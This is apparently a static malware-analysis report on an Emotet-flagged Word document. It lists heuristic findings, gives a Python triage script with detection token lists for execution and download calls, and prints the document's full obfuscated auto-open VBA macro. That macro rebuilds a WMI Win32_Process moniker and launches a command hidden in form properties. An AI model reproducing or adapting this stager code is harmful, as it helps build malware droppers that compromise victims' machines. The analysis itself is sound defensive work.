Verdict: MALICIOUS
Risk score: 232
Heuristics: 8

- ClamAV: Doc.Downloader.Emotet-7451718-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Emotet-7451718-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code.
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER). A VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive. Matched line in script:
  Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess"
  Removing every "OMDN" from the first literal yields winmgmts:Win32_. The middle piece, Sjzwtzgavjuc.Vsvjzgyjrzdav, is the value of the TextBox declared by the VB_Control attribute in the preview below; that value lives in the document's form data rather than in the VBA source, so the static extract alone cannot complete the string. With "rocess" as the tail, the result is consistent with the WMI moniker winmgmts:Win32_Process, which is what the later CreateObject and .Create calls in Splhxibnp would need.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff)
  The & operator treats Null as a zero-length string, so the argument is the decoded moniker unchanged.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script:
  Private Sub Document_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier, not a host the macro contacts.
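Two of the heuristics above, the OLE_VBA_PCODE_AUTOEXEC_EXEC pairing rule and the Split/Join decoding behind the hidden-property stager finding, are straightforward to reproduce over olevba output. The Python below is an added example written for this page, not the analyzer's own code: it runs the pairing rule over the token lists quoted in the finding, statically evaluates literal Join(Split(...)) expressions so the winmgmts:Win32_ fragment falls out without running the macro, and lists every UserForm hidden-property read. The VBA excerpt inside it is constructed from the matched lines; the function names are this example's own.

```python
import re

# Constructed excerpt that mirrors the matched lines of the extracted macro
# (the real macros.bas wraps these statements in ~400 lines of Select/Case filler).
SAMPLE_VBA = '''Private Sub Document_open()
    Splhxibnp
End Sub
Function Splhxibnp()
    Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess"
    Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff)
    Vtvqkylc = Zmfpzzehhgbff + Fodxhwzmz.Rwtxaphjyf.ControlTipText + Fodxhwzmz.Hmevofwpu.ControlTipText
    Do While Jntjvyppzzc.Create(Null & Xgtumzclb, Aeefqcdyjukof, Splhxibnp)
    Loop
End Function
'''

# Token lists exactly as the OLE_VBA_PCODE_AUTOEXEC_EXEC and
# OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER findings describe them.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")
HIDDEN_PROPS = ("ControlTipText", "Tag", "Pages", "HelpContextId")

# Join(Split("<text>", "<sep>"), "<glue>") with literal arguments only.
JOIN_SPLIT = re.compile(
    r'Join\(\s*Split\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)\s*,\s*"([^"]*)"\s*\)')
# Dotted reference ending in one of the hidden UserForm properties.
HIDDEN_REF = re.compile(
    r'\b[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)*\.(?:' + "|".join(HIDDEN_PROPS) + r')\b')


def present_tokens(src, tokens):
    """Tokens occurring in src as whole words; VBA is case-insensitive, so compare lowered."""
    low = src.lower()
    return [t for t in tokens
            if re.search(r'(?<![A-Za-z0-9_])' + re.escape(t.lower()) + r'(?![A-Za-z0-9_])', low)]


def pcode_autoexec_exec(src):
    """The pairing rule: fires only when an auto-exec entry point AND an execution token co-occur."""
    autoexec = present_tokens(src, AUTOEXEC_TOKENS)
    execs = present_tokens(src, EXEC_TOKENS)
    return {"autoexec": autoexec, "exec": execs, "fires": bool(autoexec and execs)}


def decode_join_split(src):
    """Statically evaluate literal Join(Split(text, sep), glue) expressions.
    With a non-empty delimiter VBA Split behaves like str.split; with an empty
    delimiter VBA returns the whole string as one element, handled explicitly."""
    out = []
    for text, sep, glue in JOIN_SPLIT.findall(src):
        parts = text.split(sep) if sep else [text]
        out.append(glue.join(parts))
    return out


def hidden_property_refs(src):
    """UserForm control properties read as string storage (the stager's hidden pieces)."""
    return [m.group(0) for m in HIDDEN_REF.finditer(src)]


def triage(src):
    return {
        "pcode_rule": pcode_autoexec_exec(src),
        "decoded_literals": decode_join_split(src),
        "hidden_property_refs": hidden_property_refs(src),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

Feed it the text of an extracted macros.bas and the decoded literals plus the hidden-property reads give you the skeleton of the reconstructed command; the TextBox and ControlTipText values themselves still have to be pulled from the document's form streams.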
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9594 bytes | 6b1a61b17f2458a95e99ebfa01594acc21a98a51aeef5b057d91e6f0be23d0c1 |

Detection on macros.bas:

- ClamAV: No threats found. The Emotet signature above matched the OLE document, not the decoded VBA text that olevba carved out, so a clean result on this artifact does not contradict the file-level verdict.
- Obfuscation or payload: likely. 162 of 252 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts'), consistent with name-mangling obfuscation. The quoted example is a fragment of the Split/Join string literal on the Zmfpzzehhgbff line, so the identifier count evidently includes string-literal contents as well as variable and procedure names.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Sjzwtzgavjuc"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Vsvjzgyjrzdav, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select _
Case Gkhfokxr
Case 632
Bsbcklhm _
= Cos _
(331)
Esbshmrwvmvh = Atn(130)
Iicezihbzehr _
= Cos(51)
Case 689
Ydbmikynj = Atn(917)
Ctavwhuzgubic _
= 669
Ldtwlqwlxrk = CDate _
(977)
Case 924
Hwuznhwpgfdwn = _
CInt(457)
Lwvyytyuum = Log(Ghdelyvsk)
Uvqyfyqa = Naawljeibankz
End Select
Select _
Case Dgtgibcb
Case 311
Ueyeprfg _
= Cos _
(998)
Ehavswjiqj = Atn(944)
Qqwaqsbbq _
= Cos(248)
Case 67
Qsdvaoxaz = Atn(995)
Wvfxnmrtk _
= 903
Onhipameutjck = CDate _
(763)
Case 743
Aiutjczmtau = _
CInt(729)
Ojwkhqdqo = Log(Wnullmsuuymjz)
Xpbnhuhhqlx = Uzymqwxvhnbh
End Select
Select _
Case Neefbyyurskb
Case 692
Zyloasqlsko _
= Cos _
(819)
Xbgxmajcjjd = Atn(279)
Luxvzkrz _
= Cos(920)
Case 522
Bzvndbmuqdh = Atn(338)
Lvxaclqohuzg _
= 209
Xkegrinexrn = CDate _
(37)
Case 759
Xpmqtkbl = _
CInt(127)
Jooyzufw = Log(Nojlxqsfg)
Nwktzudfw = Xhurdjnk
End Select
Splhxibnp
End Sub
Attribute VB_Name = "Fodxhwzmz"
Attribute VB_Base = "0{18D9CF1A-F049-41BC-B873-4DBFCF6E4700}{00BE8A41-D2CD-45B3-9031-16D908976C67}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bmuopqew"
Function Xgtumzclb()
Select _
Case Iotsqkvlv
Case 727
Yyifsiggxqr _
= Cos _
(295)
Wmrhcdyyhgh = Atn(184)
Dqvwcjwzxsj _
= Cos(644)
Case 168
Wzesprudwesn = Atn(19)
Vorrazffplan _
= 944
Qythgihyuorql = CDate _
(484)
Case 711
Lcjtsbkgb = _
CInt(690)
Oqjsrbjx = Log(Kkgakwtcakowy)
Rupwfssyf = Pcxpgnvibsc
End Select
Ykboaqazck = Sjzwtzgavjuc.Vsvjzgyjrzdav
Select _
Case Qocfhjwgylcz
Case 135
Ljutfszzsmcy _
= Cos _
(363)
Jjzqspcexga = Atn(896)
Rbwbsjrbkpska _
= Cos(54)
Case 649
Vqdidhwomlg = Atn(817)
Hlotiuixvljo _
= 751
Ztgfruligcr = CDate _
(634)
Case 952
Unjpmvyuybz = _
CInt(492)
Mtafuuptx = Log(Fothzelbp)
Klvxtqtasge = Shbixdyxt
End Select
Xbanklpccm = Ykboaqazck + Fodxhwzmz.Mfzwggep + Fodxhwzmz.Rxisphkvcbj + Fodxhwzmz.Ffirrcbek
Select _
Case Efbwurnmq
Case 475
Qovpndyk _
= Cos _
(95)
Xzowgexntq = Atn(555)
Asqhdgymguia _
= Cos(41)
Case 128
Qbteiejuhf = Atn(562)
Nmqyxvhyndygz _
= 15
Ddcrnixovu = CDate _
(982)
Case 2
Oifkkudsm = _
CInt(523)
Xntpvndnf = Log(Greozrqxvein)
Isnmwzahvfe = Bbsgjrvcofwu
End Select
Vcsphyutxg = Xbanklpccm + Fodxhwzmz.Gdfedqumrahz + Fodxhwzmz.Adcynifadjy.ControlTipText
Select _
Case Uzdwafwkq
Case 999
Iiodxnqjh _
= Cos _
(939)
Auidlmkpgipz = Atn(979)
Xvypxykizsn _
= Cos(811)
Case 938
Kzlpmcayjnx = Atn(340)
Aarxtjinas _
= 696
Jfjsuqqrwaqv = CDate _
(283)
Case 180
Xeqohavn = _
CInt(894)
Rczelcjhtv = Log(Rgoxgcnzkweqm)
Mlqywgzarrmgu = Bxaznjzjut
End Select
Xgtumzclb = Nmomhxzxr + Vcsphyutxg + Nmomhxzxr
Select _
Case Bfcpoizjssgl
Case 620
Dyfazdzk _
= Cos _
(327)
Xcugzwjktp = Atn(133)
Bilpegvdakcr _
= Cos(614)
Case 658
Swhltqbssm = Atn(556)
Kvjvrlniwwok _
= 904
Paimzdzmemci = CDate _
(77)
Case 399
Tjqyblvzuesre = _
CInt(778)
Whxlzaakfnk = Log(Rwsjpopngqiox)
Duhycvhff = Yszklrtxhxlic
End Select
End Function
Function Splhxibnp()
Select _
Case Cuwsmnfzdcflf
Case 949
Hlynuxlk _
= Cos _
(444)
Qiujguphuabsg = Atn(205)
Pwwjmtfari _
= Cos(231)
Case 365
Uizrjluwfk = Atn(385)
Hqdkbapfkbebo _
= 387
Ekhcbwluzvjsg = CDate _
(299)
Case 894
Gegzbvpuyrte = _
CInt(135)
Dydinqlxioav = Log(Pshjurvz)
Zdopjlismbw = Ksvgiwsyg
End Select
Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess"
Select _
Case Pexhtsssmc
Case 18
Kefqrmnnzqmfw _
= Cos _
(244)
Lasfyobfccwxx = Atn(563)
Jekchzkh _
= Cos(242)
Case 336
Lkjzsrlbwgs = Atn(641)
Vjjycovpqfxgh _
= 589
Lwbsoqnergkk = CDate _
(986)
Case 200
Bbjqhptybitjy = _
CInt(228)
Mslxsqzez = Log(Iessrejtp)
Qafzmvtzesr = Nznsfbwkl
End Select
Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff)
Select _
Case Tjkmdcsffbsq
Case 385
Fliucrgbtb _
= Cos _
(915)
Igjiffyglvwha = Atn(568)
Elwbddawbaiif _
= Cos(642)
Case 362
Pjiftlwwwnse = Atn(738)
Paujrbpxza _
= 68
Khiwwsrsfn = CDate _
(817)
Case 931
Anioaolzbmmz = _
CInt(738)
Nmcsjilkboozq = Log(Fdcbzietbx)
Vhxviixeepn = Jpltzaylmwi
End Select
Vtvqkylc = Zmfpzzehhgbff + Fodxhwzmz.Rwtxaphjyf.ControlTipText + Fodxhwzmz.Hmevofwpu.ControlTipText
Select _
Case Lsriftrydqgts
Case 657
Ecorhxdd _
= Cos _
(178)
Nfzgimrh = Atn(937)
Puvxdizr _
= Cos(283)
Case 681
Yvhrdkfbkaiow = Atn(6)
Orsueomiknkg _
= 640
Yymlwfsxidx = CDate _
(451)
Case 791
Wjtaxqfprgw = _
CInt(542)
Lmweteonmb = Log(Azaqjpwx)
Yrmnplyhrpx = Fbektscjixxw
End Select
Wxszvkzmqhdba = Vtvqkylc + Sjzwtzgavjuc.Vsvjzgyjrzdav
Select _
Case Ltnkoouyan
Case 76
Uefrjmyxfmff _
= Cos _
(815)
Cxxfxzdcv = Atn(944)
Imktlaefd _
= Cos(504)
Case 496
Szpauxfzoi = Atn(297)
Lwavqzqsj _
= 309
Azndulazcu = CDate _
(533)
Case 11
Yqwfgxvww = _
CInt(693)
Yxkfogmvz = Log(Obgtknoidm)
Ceuukunyqxu = Jfmspyuhl
End Select
Set Splhxibnp = CreateObject(Wxszvkzmqhdba)
Select _
Case Bbrjowvgkek
Case 873
Eifxoigdzwqmy _
= Cos _
(456)
Wwomouurhk = Atn(903)
Wzyojejhq _
= Cos(33)
Case 161
Urjlcebxqi = Atn(323)
Nqxkfkryml _
= 64
Ebhghpgwzl = CDate _
(423)
Case 595
Firmfmmznpkym = _
CInt(268)
Xyyyjqzh = Log(Uqbbmkcwbewsf)
Zbwoqitn = Xamkfgaqok
End Select
Splhxibnp.XSize = False * False
Select _
Case Qyirzjrpsthta
Case 464
Rdguabtrqkoae _
= Cos _
(331)
Jwwfmymf = Atn(879)
Rnpywspjrliza _
= Cos(995)
Case 260
Xgsgljmapkkwu = Atn(569)
Exvwjnettrzrn _
= 288
Kvjkoruyzpem = CDate _
(637)
Case 743
Lwutrhldeeh = _
CInt(285)
Yplszxuzpnk = Log(Kyvhebefh)
Xvwjgrecw = Jowepfowikskw
End Select
Splhxibnp.YSize = False * False
Select _
Case Ajtlglezw
Case 381
Qcaxbdzwjts _
= Cos _
(216)
Zqloyuzlfyiph = Atn(934)
Nbxqqazbqcve _
= Cos(103)
Case 682
Hohqwlpzq = Atn(914)
Wekdriug _
= 104
Iwccwapvld = CDate _
(133)
Case 268
Hyjayllenkvo = _
CInt(418)
Pxyubxzvysfn = Log(Adexlcxmtr)
Vbvyaniaks = Csulzrvllze
End Select
Do While Jntjvyppzzc.Create(Null & Xgtumzclb, Aeefqcdyjukof, Splhxibnp)
Loop
Select _
Case Grsnftpk
Case 269
Qjysrgcnkrgzl _
= Cos _
(950)
Uvkiyghrdhdzf = Atn(731)
Wsncytsytry _
= Cos(396)
Case 77
Hvggsokxfby = Atn(628)
Sulngxcwv _
= 492
Ibfbxqramr = CDate _
(809)
Case 538
Axhrzqrrp = _
CInt(561)
Bxnflbruliu = Log(Jjaojxerinl)
Gdfewxwleeklg = Wxzfarhqqdhr
End Select
End Function